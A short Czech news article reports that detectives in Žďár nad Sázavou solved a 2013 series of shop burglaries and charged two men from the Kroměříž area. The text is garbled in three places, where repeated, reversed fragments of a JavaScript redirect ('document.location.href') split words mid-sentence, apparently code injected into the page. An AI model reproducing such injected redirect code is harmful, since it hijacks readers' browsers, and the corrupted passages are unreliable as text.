Žďár nad Sázavou, aktuality, kriminalisté, vloupání
Rainbow page separator

Kriminalisté objasnili sérii vloupání do prodejen

Středa, 14. srpna 2013

Žďár nad Sázavou / Po několikaměsíčním pátrání se podařilo žďárským kriminalistům dopadnout pachatele vloupání do prodejen, ke kterým docházelo od dubna do června le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku na Žďársku. Bylo tak zahájeno trestní stíhání dvou mužů ve věku 42 a 40 let z Kroměřížska, kteří nyní čelí obvinění ze spáchání trestných činů krádeže a poškození cizí věci.

Předmětem jejich zájmu byly převážně peníze, cigarety a alkohol. Do čtyř obchodů na Žďársku a jednoho na Polensku se vloupali společně; ukradli tam věci za téměř 320 tisíc korun a poškodili zařízení v hodnotě téměř 30 tisíc korun. „Starší z obviněných se sám vloupal do dalších sedmi provozoven na Žďársku, kde odcizil věci za téměř 200 tisíc korun a poškodil zařízení za bezmála s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc,“ uvedl vedoucí žďárských kriminalistů Radek Uhlíř.

Kriminalisté muže ve spolupráci s brněnskou zásahovou jednotkou zadrželi koncem července na Kroměřížsku, následně byly provedeny domovní prohlídky. Při nich byly zajištěny nástroje, s jejichž pomocí se pachatelé do prodejen vloupali.

Oba muži za sebou mají boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou trestní minulost. Staršímu z nich hrozí až osmiletý trest odnětí svobody, mladší z obviněných může být odsouzen až k pětiletému trestu.